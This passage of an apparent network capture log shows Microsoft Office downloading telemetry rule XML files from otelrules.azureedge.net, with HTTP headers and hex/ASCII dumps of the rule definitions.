                                                  x-ms-request-id: 88bd8b3f-d01e-0049-5d65-1de7dc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173416Z-17db6f7c8cf6qp7g7r97wxgbqc00000004mg000000003n1g
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:16 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                  Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                  Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                  Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                  Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                  Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                  Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                  Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                  2024-10-13 17:34:16 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                  Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  33192.168.2.44979713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:17 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:17 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3788
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC2126A6"
                                                  x-ms-request-id: a65062bf-401e-00ac-0ea3-1b0a97000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173417Z-17db6f7c8cfq2j6f03aq9y8dns00000004ag00000000d9u2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:17 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.44980113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:17 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:17 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2160
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA3B95D81"
                                                  x-ms-request-id: 6472af2a-e01e-00aa-15e5-1cceda000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173417Z-17db6f7c8cf96l6t7bwyfgbkhw000000044g00000000emp4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:17 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.44980013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:17 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:17 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB56D3AFB"
                                                  x-ms-request-id: 8bb3084a-701e-0053-175b-1c3a0a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173417Z-17db6f7c8cffhvbz3mt0ydz7x400000003dg000000008cgt
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:17 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  36192.168.2.44979913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:17 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:17 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2980
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 9229949d-801e-008c-498a-1b7130000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173417Z-17db6f7c8cf6qp7g7r97wxgbqc00000004ng000000001e61
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:17 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.44979813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:17 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:17 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 450
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                  ETag: "0x8DC582BD4C869AE"
                                                  x-ms-request-id: d08e5818-a01e-003d-3417-1c98d7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173417Z-17db6f7c8cfcl4jvqfdxaxz9w800000002ng000000006cb1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:17 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.44980313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:18 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:18 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                  ETag: "0x8DC582B9F6F3512"
                                                  x-ms-request-id: a9e1c981-f01e-003f-3a0f-1cd19d000000
                                                  x-ms-version: 2018-03-28
